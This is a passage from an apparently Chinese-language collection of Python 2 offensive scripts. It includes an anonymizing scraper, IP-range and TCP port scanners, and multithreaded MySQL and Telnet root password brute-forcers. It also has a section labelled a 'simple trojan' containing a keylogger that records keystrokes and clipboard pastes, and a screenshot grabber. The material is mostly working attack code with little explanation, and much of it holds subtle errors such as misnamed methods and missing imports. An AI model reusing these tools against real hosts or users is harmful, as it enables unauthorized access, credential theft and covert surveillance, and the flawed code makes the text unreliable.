self.addheaders = [('User-agent',(self.user_agents[index]))]
def change_proxy(self):
if self.proxies:
index = random.randrange(0, len(self.proxies))
self.set_proxies({'http': self.proxies[index]})
def anonymize(self, sleep= False):
self.clear_cookies()
self.change_user_agent()
self.change_proxy()
if sleep:
time.sleep(60)# -*- coding: utf-8 -*-
from anonBrowser import *
from BeautifulSoup import BeautifulSoup
import os
import optparse
import re
def printLinks(url):
ab = anonBrowser()
ab.anonymize()
page = ab.open(url)
html = page.read()
try:
print '[+] Printing Links From Regex.'
link_finder = re.compile('href="(.*?)"')
links = link_finder.findall(html)
for link in links:
print link
except:
pass
try:
print '\n[+] Printing Links From BeautifulSoup.'
soup = BeautifulSoup(html)
links = soup.findall(name='a')
for link in links:
if link.has_key('href'):
print link['href']
except:
pass
def main():
parser = optparse.optionparser('usage %prog -u <target url>')
parser.add_option('-u',dest='tgturl',type='string',help='specify target url')
(options,args) = parser.parser_args()
url = options.url
if url == None:
print parser.usage
exit(0)
else:
printLinks(url)
if __name__ == '__main__':
main()# -*- coding: utf-8 -*-
from anonBrowser import *
from BeautifulSoup import BeautifulSoup
import os
import optparse
def mirrorImages(url,dir):
ab = anonBrowser()
ab.anonymize()
html = ab.open(url)
soup = BeautifulSoup(html)
image_tags = soup.findall('img')
for image in image_tags:
filename = image['src'].lstrip('http://')
filename = os.path.join(dir,filename.replace('/','_'))
print '[+] Saving ' + str(filename)
data = ab.open(image['src']).read()
ab.back()
save = open(filename,'wb')
save.write(data)
save.close()
def main():
parser = optparse.optionparser('usage %prog -u <target url> -d <destination directory>')
parser.add_option('-u',dest='tgturl',type='string',help='specify target url')
parser.add_option('-d', dest='dir', type='string', help='specify destination directory')
(options,args) = parser.parser_args()
url = options.tgturl
dir = options.dir
if url == None or dir == None:
print parser.usage
exit(0)
else:
try:
mirrorImages(url, dir)
except Exception,e:
print '[-] Error Mirroing Images '
print '[-] ' + str(e)
if __name__ == '__main__':
main()12、多线程爆破mysql
# -*- coding: utf-8 -*-
import threading
import argparse
import socket
import Queue
import netaddr
import MySQLdb
import time
import sys
class Mysqlfuzz:
def __init__(self,addr,tnum):
self.scanque = Queue.Queue()
self.tnum = tnum
self.tmpnum = tnum
self.lock = threading.Lock()
self.openlist = []
if addr.find("-") != -1: #ip地址识别
for ip in netaddr.IPRange(addr.split("-")[0],addr.split("-")[1]):
self.scanque.put(ip)
else:
for ip in netaddr.IPNetwork(addr).iter_hosts():
self.scanque.put(ip)
self.qsize = self.scanque.qsize() #队列大小
for i in range(tnum): #开启线程
t = threading.Thread(target=self.ScanPort)
t.setDaemon(True)
t.start()
while self.tmpnum > 0:
time.sleep(1.0)
print "[*]:cracking MySQL Password ..."
with open("pass.txt","r") as file: #读取字典
data = file.readlines()
for ip in self.openlist: #逐条尝试密码
for line in data:
self.scanque.put(line.strip())
for i in range(tnum):
t = threading.Thread(target=self.Crack,args=(ip,))
t.setDaemon(True)
t.start()
while self.scanque.qsize() > 0:
time.sleep(1.0)
def Crack(self,ip): #连接目标MySQL数据库
while self.scanque.qsize() > 0:
try:
password = self.scanque.get()
conn = MySQLdb.connect(host=ip, user='root', passwd=password, db='test', port=3306, connect_timeout=4)
self.lock.acquire()
msg = "[+]:%s Username: root Password is: %s" % (ip, password)
print msg
output = open('good.txt', 'a')
output.write(msg + "\r\n")
self.lock.release()
break
except:
pass
def ScanPort(self): # 查看目标3306端口状态
while self.scanque.qsize() > 0:
try:
ip = self.scanque.get()
s = socket.socket()
s.settimeout(4)
s.connect((str(ip), 3306))
self.lock.acquire()
print ip, " 3306 open"
self.openlist.append(str(ip))
self.lock.release()
except:
pass
self.tmpnum -= 1
if __name__ == "__main__": # 获取命令行参数并开始尝试暴力破解
parse = argparse.ArgumentParser(description="mysqlfuzz")
parse.add_argument('-a', '--addr', type=str, help="ipaddress")
parse.add_argument('-t', '--thread', type=int, help="ThreadNumber",default=100)
args = parse.parse_args()
if not args.addr:
parse.print_help()
sys.exit(0)
addr = args.addr
tnum = args.thread
Mysqlfuzz(addr, tnum)13、IP段端口扫描
# -*- coding: utf-8 -*-
from PyQt4 import Qtcore,QtGui
import sys
import socket
import threading,time
import thread
import ini
import time # 获取时间和延时
socket.setdefaulttimeout(10) # 设置全局默认超过时间
try:
_fromUtf8 = Qtcore.Qstring.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_Form(object):
def setupUi(self,Form):
Form.setObjectName(_fromUtf8("Form"))
Form.resize(272, 482)
self.textEdit = QtGui.QTextEdit(Form)
self.textEdit.setGeometry(QtCore.QRect(60, 10, 201, 31))
self.textEdit.setObjectName(_fromUtf8("textEdit"))
self.textEdit_2 = QtGui.QTextEdit(Form)
self.textEdit_2.setGeometry(QtCore.QRect(60, 50, 201, 31))
self.textEdit_2.setObjectName(_fromUtf8("textEdit_2"))
self.textEdit_3 = QtGui.QTextEdit(Form)
self.textEdit_3.setGeometry(QtCore.QRect(60, 90, 81, 31))
self.textEdit_3.setObjectName(_fromUtf8("textEdit_3"))
self.label = QtGui.QLabel(Form)
self.label.setGeometry(QtCore.QRect(10, 30, 54, 12))
self.label.setObjectName(_fromUtf8("label"))
self.label_2 = QtGui.QLabel(Form)
self.label_2.setGeometry(QtCore.QRect(10, 70, 54, 12))
self.label_2.setObjectName(_fromUtf8("label_2"))
self.label_3 = QtGui.QLabel(Form)
self.label_3.setGeometry(QtCore.QRect(20, 110, 54, 12))
self.label_3.setObjectName(_fromUtf8("label_3"))
self.pushButton = QtGui.QPushButton(Form)
self.pushButton.setGeometry(QtCore.QRect(160, 90, 101, 31))
self.pushButton.setObjectName(_fromUtf8("pushButton"))
self.textEdit_4 = QtGui.QTextEdit(Form)
self.textEdit_4.setGeometry(QtCore.QRect(10, 150, 251, 321))
self.textEdit_4.setObjectName(_fromUtf8("textEdit_4"))
self.label_4 = QtGui.QLabel(Form)
self.label_4.setGeometry(QtCore.QRect(70, 130, 251, 25))
self.label_4.setObjectName(_fromUtf8("label_4"))
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
QtCore.QObject.connect(self.pushButton, QtCore.SIGNAL(_fromUtf8("clicked()")), self.test)
def test(self):
thread.start_new_thread(self.mess, ())
def mess(self):
ip1 = self.textEdit.toPlainText() # 获取内容
ip2 = self.textEdit_2.toPlainText() # 获取内容
port = self.textEdit_3.toPlainText() # 获取内容
ini.ini_write(ip1, ip2, port) # 修改INI
self.textEdit_4.append(u"扫描结果会保存在程序目录下ip.txt")
list_ip = self.gen_ip(self.ip2num(ip1), self.ip2num(ip2))
self.pushButton.setEnabled(0) # 将按钮改成禁用
self.textEdit_4.append(u"需要扫描" + str(len(list_ip)) + u"个IP")
I1 = 0 # 得到list的第一个元素
ip = 0
self.textEdit_4.append(u"开始扫描IP--" + time.strftime('%Y.%m.%d-%H. %M. %S'))
while I1 < len(list_ip):
if ip >= 200:
ini.ini_write(list_ip[I1], ini.IP2, port) # 修改INI
ip = 0
print list_ip[I1]
ip = ip + 1
time.sleep(0.1) # 确保先运行Seeker中的方法
thread.start_new_thread(self.socket_port, (list_ip[I1], int(port)))
I1 = I1 + 1 # 一层
self.textEdit_4.append(u"IP扫描完成--" + time.strftime('%Y.%m.%d-%H.%M.%S'))
self.pushButton.setEnabled(1) # 将按钮改成可用
def socket_port(self,ip,PORT):
try:
self.label_4.setText(U"正在扫描IP:"+str(ip)+u":"+str(PORT))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,PORT))
self.textEdit_4.append(str(ip)+u":"+str(PORT)+u"端口开放")
xxx=file('ip.txt','w')
xxx.write(str(ip))
xxx.write('\n')
xxx.close()
except:
print ip, u":", PORT, u"端口未开放"
def ip2num(self,ip):
ip = [int(x) for x in ip.split('.')]
return ip[0]<<24 | ip[1]<<16 | ip[2]<<8 | ip[3]
def num2ip(self,num):
if num>=IPend:
self.textEdit_4.append(u"IP导入数组完成")
return '%s.%s.%s.%s' % ( (num & 0xff000000) >> 24,(num & 0x00ff0000) >> 16,(num & 0x0000ff00) >> 8,num & 0x000000ff)
def gen_ip(self,Aip1,Aip2): #返回数组
global IPend
IPend=Aip2
return [self.num2ip(num) for num in range(Aip1,Aip2+1) if num & 0xff]
def iniA(self):
ini.ini_get() # 读取INI
self.textEdit.setPlainText(ini.IP1)
self.textEdit_2.setPlainText(ini.IP2)
self.textEdit_3.setPlainText(ini.port)
def retranslateUi(self, Form):
Form.setWindowTitle(QtGui.QApplication.translate("Form","Simple", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("Form", "开始IP:", None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(QtGui.QApplication.translate("Form", "结束IP:", None, QtGui.QApplication.UnicodeUTF8))
self.label_3.setText(QtGui.QApplication.translate("Form", "端口:", None, QtGui.QApplication.UnicodeUTF8))
self.pushButton.setText(QtGui.QApplication.translate("Form", "开始扫描", None, QtGui.QApplication.UnicodeUTF8))
self.label_4.setText(QtGui.QApplication.translate("Form", "扫描结果", None, QtGui.QApplication.UnicodeUTF8))
class Start(QtGui.QMainWindow):
def __init__(self,parent=None):
QtGui.QWidget.__init__(self,parent)
self.ui=Ui_Form()
self.ui.setupUi(self)
self.ui.iniA()
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
myapp = Start()
myapp.show()
sys.exit(app.exec_())# -*- coding: utf-8 -*-
IP1 = "" #扫描IP
IP2 = "" #当前已经扫到的IP
port = "" #扫描端口
INITXT = "IP.ini" # INI文件名字
import ConfigParser
def ini_get(): # 读取INI
try:
global IP1
global IP2
global port
global INITXT
config = ConfigParser.ConfigParser()
config.readfp(open(INITXT))
IP1 = config.get("ipdata","ip1")
IP2 = config.get("ipdata","ip2")
port = config.get("ipdata","port")
except:
print "读取INI错误"
ini_add("","","") # 写入INI
def ini_add(ip1,ip2,pt):# 写入INI
try:
global INITXT
config = ConfigParser.ConfigParser()
config.add_section("ipdata") # 设置section段及对应的值
config.set("ipdata","ip1",ip1)
config.set("ipdata", "ip2", ip2)
config.set("ipdata", "pt", pt)
config.write(open(INITXT,"w")) # 写入文件
except:
print "写入INI错误"
def ini_write(ip1,ip2,pt): #修改INI
try:
global INITXT
config = ConfigParser.ConfigParser()
config.read(INITXT)
if not config.has_section("ipdata"): #看是否存在该Section,不存在则创建
temp = config.add_section("")
config.set("ipdata","ip1",ip1)
config.set("ipdata", "ip2", ip2)
config.set("ipdata", "pt", pt)
config.write(open(INITXT,"r+"))
except:
print "修改INI错误"
ini_add("","") # 写入INI14、TCP端口扫描
# -*- coding: utf-8 -*-
from socket import *
# 简单扫描
def PortScanner(host,port):
try:
s = socket(AF_INET,SOCK_STREAM)
s.connect((host,port))
print("[+] %d open" % port)
s.close()
except:
print("[-] %d close" % port)
def main():
setdefaulttimeout(1)
for p in range(20,100):
PortScanner('192.168.1.3',p)
if __name__ == '__main__':
main()# -*- coding: utf-8 -*-
from socket import *
import threading
lock = threading.Lock()
openNum = 0
threads = []
# 简单扫描
def PortScanner(host,port):
global openNum
try:
s = socket(AF_INET,SOCK_STREAM)
s.connect((host,port))
lock.acquire() #所定成员
openNum += 1
print("[+] %d open" % port)
lock.release() #解锁
s.close()
except:
pass
def main():
setdefaulttimeout(1)
for p in range(1,1024): #端口范围
t = threading.Thread(target=PortScanner,args=('192.168.1.3',p))
threads.append(t) #创建threads数据
t.start()
for t in threads:
t.join()
print("[*] The scan is complete!")
print("[*] a total of %d open port" % (openNum))
if __name__ == '__main__':
main()15、Telnet密码爆破
# -*- coding: utf-8 -*-
import telnetlib
import time
import sys
import os
def do_telnet(Host, Port, username, passowrd, finish):
# 链接Telnet服务器
tn = telnetlib.Telnet(Host, Port, timeout=1)
tn.set_debuglevel(3)
# 输入登录用户名
tn.read_until("login: ")
tn.write(str(username)+'\n')
# 输入登录密码
tn.read_until("Password: ")
tn.write(str(passowrd) + '\n')
# 判断密码错误提示,如果没有提示说明登录成功
if tn.read_until(finish):
print "[-]Login Failed\n"
tn.close()
if __name__ == '__main__':
Host = raw_input("IP:") # talent服务器IP
Port = raw_input("Port:") # Telnet服务器端口
username = 'root' # 登录用户名
finish = 'incorrect' # 密码错误提示
pw_file = open('pass.txt','r') # 密码文件
Index = 0
print time.asctime(),": begin","\n"
while True:
password = pw_file.readline()
Index += 1
print Index,time.asctime(),"Try","",username,":",password,""
if len(password) == 0:
break
do_telnet(Host, Port, username, password, finish)
pw_file.close()16、简易木马程序
# -*- coding: utf-8 -*-
from ctypes import *
import pyHook
import win32clipboard
user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None
def get_current_process():
# 获取最上层的窗口句柄
hwnd = user32.GetForegroundWindow()
# 获取进程ID
pid = c_ulong(0)
user32.GetwindowThreadProcessId(hwnd,byref(pid))
# 将进程ID存入变量中
process_id = "%d" % pid.value
# 申请内存
executable = create_string_buffer("\0x00"*512)
h_process = kernel32.OpenProcess(0x400 | 0x10,False,pid)
psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)
# 读取窗口标题
windows_title = create_string_buffer("\0x00"*512)
length = user32.GetwindowTextA(hwnd,byref(windows_title),512)
# 打印
print
print "[ PID: %s-%s-%s ]" % (process_id,executable.value,windows_title.value)
print
# 关闭handles
kernel32.CloseHandle(hwnd)
kernel32.CloseHandle(h_process)
# 定义击键监听事件函数
def KeyStroke(event):
global current_window
# 检测目标窗口是否转移(换了其他窗口就监听新的窗口)
if event.WindowName != current_window:
current_window = event.WindowName
# 函数调用
get_current_process()
# 检测击键是否常规按键(非组合键等)
if event.Ascii > 32 and event.Ascii < 127 :
print chr(event.Ascii)
else:
# 如果发现Ctrl+v(粘贴)事件,就把查娜铁板内容记录下来
if event.Key == "V":
win32clipboard.OpenClipboard()
pasted_value = win32clipboard.GetClipboardData()
win32clipboard.CloseClipboard()
print "[PASTE]-%s" % (pasted_value),
else:
print "[%s]" % event.Key
# 循环监听下一个击键事件
return True
# 创建并注册hook管理器
k1 = pyHook.HookManager()
k1.KeyDown = KeyStroke
# 注册hook并执行
k1.HookKeyboard()
pythoncom.PumpMessages()
# -*- coding: utf-8 -*-
import win32gui
import win32ui
import win32con
import win32api
# 获取桌面
hdesktop = win32gui.GetDesktopWindow()
# 分辨率适应
width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)
height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
left = win32api.GetSystemMetrics(win32con.SM_XVVIRTUALSCREEN)
top = win32api.GetSystemMetrics(win32con.SM_YVVIRTUALSCREEN)
# 创建设备描述表
desktop_dc = win32gui.GetWindowDC(hdesktop)
img_dc = win32ui.CreateDCFromHandle(desktop_dc)
# 创建一个内存设备描述表
mem_dc = img_dc.CreateCompatibleDC()
# 创建位图对象
screenshot = win32ui.CreateBitmap()
screenshot.CreateCompatibleBitmap(img_dc,width,height)
mem_dc.SelectObject(screenshot)
# 截图至内存设备描述表
mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY)
# 将截图保存到文件
screenshot.SaveBitmapFile(mem_dc,'C:\\Users\\Administrator\\Desktop\\Screenshots.bmp')
# 内存释放
mem_dc.DeleteDC()
win32gui.DeleteObject(screenshot.Gethandle())
最后更新于
这有帮助吗?